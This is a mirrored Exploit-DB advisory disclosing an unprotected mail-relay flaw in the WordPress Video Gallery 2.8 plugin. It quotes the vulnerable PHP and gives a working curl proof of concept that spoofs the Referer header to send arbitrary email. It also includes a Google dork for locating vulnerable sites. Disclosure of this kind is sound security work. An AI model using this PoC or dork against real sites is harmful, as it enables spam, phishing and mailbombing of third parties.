WordPress Plugin Video Gallery 2.8 – Arbitrary Mail Relay - 体验盒子

作者： Claudio Viviani
日期： 2015-05-26
类别：
webapps
平台：
php
来源：https://www.exploit-db.com/exploits/37106/
######################

# Exploit Title : WordPress Video Gallery 2.8 Unprotected Mail Page

# Exploit Author : Claudio Viviani

# Website Author: http://www.homelab.it
http://archive-exploit.homelab.it/1 (Full HomelabIT Vulns Archive)

# Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery

# Software Link : https://downloads.wordpress.org/plugin/contus-video-gallery.2.8.zip

# Dork Google: index of "contus-video-gallery"


# Date : 2015-04-05

# Tested on : Windows 7 / Mozilla Firefox
Linux / Mozilla Firefox 

######################

# Description

 WordPress Video Gallery 2.8 suffers from Unprotected Mail Page.
 
 This vulnerability is exploitable to dos, phishing, mailbombing, spam...
 
 The "email" ajax action is callable from any guest visitor (/contus-video-gallery/hdflvvideoshare.php)
 
/**
* Email function
*/
 add_action( 'wp_ajax_email', 'email_function' );
 add_action( 'wp_ajax_nopriv_email', 'email_function' );
 
 function email_function() {
 require_once( dirname( __FILE__ ) . '/email.php' );
 die();
 }

 Any user can send email from /contus-video-gallery/email.php to any recipients.
 
 The variables used to send emails are:
 
 $to = filter_input( INPUT_POST, 'to', FILTER_VALIDATE_EMAIL );
 $from = filter_input( INPUT_POST, 'from', FILTER_VALIDATE_EMAIL );
 $url= filter_input( INPUT_POST, 'url', FILTER_VALIDATE_URL );
 $subject= filter_input( INPUT_POST, 'Note', FILTER_SANITIZE_STRING );
 $message_content =filter_input( INPUT_POST, 'Note', FILTER_SANITIZE_STRING );
 $title= filter_input( INPUT_POST, 'title', FILTER_SANITIZE_STRING );
 $referrer = parse_url( $_SERVER['HTTP_REFERER'] );
 $referrer_host = $referrer['scheme'] . '://' . $referrer['host'];
 $pageURL= 'http';
 
 It assumes that if the provided “Referrer” field fits the website’s URL, then it’s okay to send this email:
 
 if ( $referrer_host === $pageURL ) {
 $headers = "MIME-Version: 1.0" . "\r\n";
 $headers .= "Content-type:text/html;charset=UTF-8" . "\r\n";	
 $headers .= "From: " . "<" . $from . ">\r\n";
 $headers .= "Reply-To: " . $from . "\r\n";
 $headers .= "Return-path: " . $from;
 $username = explode('@' , $from ); 
 $username = ucfirst($username['0']);
 $subject=$username . ' has shared a video with you.';
 $emailtemplate_path= plugin_dir_url( __FILE__ ).'front/emailtemplate/Emailtemplate.html';	
 $message =file_get_contents( $emailtemplate_path);
 $message = str_replace( '{subject}', $subject, $message );
 $message = str_replace( '{message}', $message_content, $message);
 $message = str_replace( '{videourl}',$url,$message );
 $message = str_replace('{username}',$username ,$message );
 if ( @mail( $to, $title, $message, $headers ) ) {
 echo 'success=sent';
 } else {
 echo 'success=error';
 }
 } else {
 echo 'success=error';
 }
 
 The “Referer” field can easily be modified by the attacker!

######################

# PoC

 curl -X POST -d "from=attacker@attacker.com&to=victim@victim.com&Note=BodyMessage&title=Subject&url=http://www.homelab.it" \
 -e http://127.0.0.1 http://127.0.0.1/wp-admin/admin-ajax.php?action=email

 cUrl switch "-e" spoof referer address

# Http Response

success=sent 

# Poc Video

http://youtu.be/qgOGPm1-tNc
 

#######################

Discovered By : Claudio Viviani
http://www.homelab.it
http://archive-exploit.homelab.it/1 (Full HomelabIT Archive Exploit)
http://ffhd.homelab.it (Free Fuzzy Hashes Database)
				
info@homelab.it
homelabit@protonmail.ch

https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################